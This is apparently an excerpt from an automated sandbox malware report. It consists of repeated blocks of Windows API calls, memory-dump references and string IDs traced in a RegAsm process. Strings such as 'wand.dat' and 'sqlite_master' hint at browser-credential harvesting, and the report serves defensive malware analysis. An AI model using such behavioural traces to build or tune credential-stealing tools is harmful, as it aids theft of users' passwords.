                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                      • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1549203181-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3550944819-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$free
                                                                                                                                                                                                                      • String ID: g4@
                                                                                                                                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: sqlite_master
                                                                                                                                                                                                                      • API String ID: 438689982-3163232059
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3917621476-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 822687973-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2678498856-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3888421826-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3727323765-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$CloseHandle
                                                                                                                                                                                                                      • String ID: General
                                                                                                                                                                                                                      • API String ID: 3722638380-26480598
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                      • String ID: d=E
                                                                                                                                                                                                                      • API String ID: 909852535-3703654223
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                      • API String ID: 1983396471-123907689
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                      • String ID: URL
                                                                                                                                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                                                                                      • String ID: %%-%d.%ds
                                                                                                                                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                      • String ID: F^@
                                                                                                                                                                                                                      • API String ID: 568519121-3652327722
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                                                                                      • String ID: WinPos
                                                                                                                                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                      • API String ID: 4271163124-1506664499
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@DeleteObject
                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                      • API String ID: 1103273653-628097481
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
